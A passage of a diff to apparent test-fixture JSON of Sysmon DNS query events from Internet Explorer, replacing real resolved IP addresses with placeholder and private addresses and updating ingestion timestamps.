UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15243,17 +15068,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -15270,14 +15095,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742253700Z", + "ingested": "2021-12-09T13:50:23.457433600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15345,12 +15169,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { @@ -15367,13 +15191,13 @@ "cdn.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742262200Z", + "ingested": "2021-12-09T13:50:23.457439600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15452,12 +15276,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { @@ -15475,13 +15299,13 @@ "cdn3.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742270700Z", + "ingested": "2021-12-09T13:50:23.457445600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15549,12 +15373,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { @@ -15571,13 +15395,13 @@ "rtb0.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742279100Z", + "ingested": "2021-12-09T13:50:23.457451400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15645,12 +15469,12 @@ "type": "CNAME" }, { - "data": "20.36.236.157", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "network": { @@ -15667,13 +15491,13 @@ "dev.virtualearth.net" ], "ip": [ - "20.36.236.157" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742287900Z", + "ingested": "2021-12-09T13:50:23.457457100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15741,12 +15565,12 @@ "type": "CNAME" }, { - "data": "23.52.161.238", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "network": { @@ -15763,13 +15587,13 @@ "t.ssl.ak.dynamic.tiles.virtualearth.net" ], "ip": [ - "23.52.161.238" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742296300Z", + "ingested": "2021-12-09T13:50:23.457463Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15829,11 +15653,11 @@ }, "answers": [ { - "data": "74.217.253.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -15841,7 +15665,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -15849,7 +15673,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -15857,7 +15681,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -15865,7 +15689,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -15873,23 +15697,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -15904,24 +15728,24 @@ "rp.gwallet.com" ], "ip": [ - "74.217.253.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742304700Z", + "ingested": "2021-12-09T13:50:23.457468800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 